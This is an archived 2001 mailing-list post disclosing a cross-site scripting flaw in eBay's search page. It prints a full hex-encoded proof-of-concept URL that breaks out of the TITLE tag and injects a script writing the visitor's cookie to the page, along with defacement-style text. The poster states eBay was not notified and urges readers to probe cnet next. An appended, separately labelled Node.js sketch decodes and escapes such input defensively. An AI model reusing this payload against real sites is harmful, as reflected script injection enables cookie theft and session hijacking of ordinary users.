cross site scripting vulnerability on ebay.com

From: - - (phineat_private)
Date: Tue Dec 18 2001 - 19:04:42 PST

    There is a cross-site scripting vulnerability within the search code @ ebay.com. Below is the proof of concept URL & is harmless.. make sure it is entered exactly as it is shown. Of course, if you have ANY brains AT ALL.. you will verify the hex values in the URL before processing the link. Basically, it just document.write's the cookie that ebay.com stores in your browser. However, there are many more possibilities.. ebay has not been notified.
    
    http://cq-search.ebay.com/search/search.dll?query=%70%68%69%6e%65%20%30%77%6e%73%20%29%3c%2f%54%49%54%4c%45%3e%3c%53%43%52%49%50%54%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%42%3e%59%6f%75%72%20%43%6f%6f%6b%69%65%20%49%73%20%42%65%6c%6f%77%3a%3c%2f%42%3e%3c%42%52%20%2f%3e%27%20%2b%20%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%3c%2f%53%43%52%49%50%54%3e<BR+/><CENTER><B>...Your+0wner+is+above...</B><BR+/>(in+the+TITLE+tag...+d0h!)<P+/>..<B>greetz</B>..<BR+/>s1gnal_9,+Narr0w,+%23!security+and+PBS+;]</CENTER><P+/><FONT+FACE="Arial"+SIZE="2px"><B>So+many+new+IE+bugz+out...+So+many+new+possibilities!</B><BR+/>Where+Do+You+Want+To+Go+Today?®</FONT><P+/><TITLE>+(+heh.
    
    Try playing with cnet /*you just might find something interesting*/ ;]
    
    'phine
    
    ------------------------------------------------------------
    This email was sent through the free email service at http://www.anonymous.to/
    To report abuse, please visit our website and click 'Contact Us.'  
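
The post advises verifying the hex values in a URL before following it, and notes that the search term lands in the TITLE tag. As an added example (not part of the original post), this Node.js sketch decodes a link's query parameters for inspection and shows the HTML escaping that keeps a reflected search term inside the TITLE element; the host name, the `renderTitle` template and the sample value are constructed assumptions.

```javascript
// Added example: decode a link's query string before visiting it, and show
// the output encoding that keeps a reflected search term inert in HTML.

// Characters that let text break out of an element such as <TITLE>.
const MARKUP = /[<>"'&]/;

// Return every query parameter with its percent-decoded value and a flag
// saying whether the decoded value contains HTML markup characters.
function inspectQuery(link) {
  const url = new URL(link);
  const findings = [];
  for (const [name, value] of url.searchParams) {
    findings.push({ name, decoded: value, hasMarkup: MARKUP.test(value) });
  }
  return findings;
}

// HTML-escape a value before writing it into element content or an attribute.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Hypothetical server-side template: the search term echoed into the title.
function renderTitle(query) {
  return '<TITLE>Search results for ' + escapeHtml(query) + '</TITLE>';
}

// Constructed sample (not the URL from the post): hex for "</TITLE><B>hi</B>".
const SAMPLE = 'http://search.example.test/search.dll?query=' +
  '%3c%2f%54%49%54%4c%45%3e%3c%42%3e%68%69%3c%2f%42%3e';

for (const f of inspectQuery(SAMPLE)) {
  console.log(f.name, JSON.stringify(f.decoded), 'markup:', f.hasMarkup);
  console.log(renderTitle(f.decoded));
}
```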
    



    This archive was generated by hypermail 2b30 : Tue Dec 18 2001 - 19:29:01 PST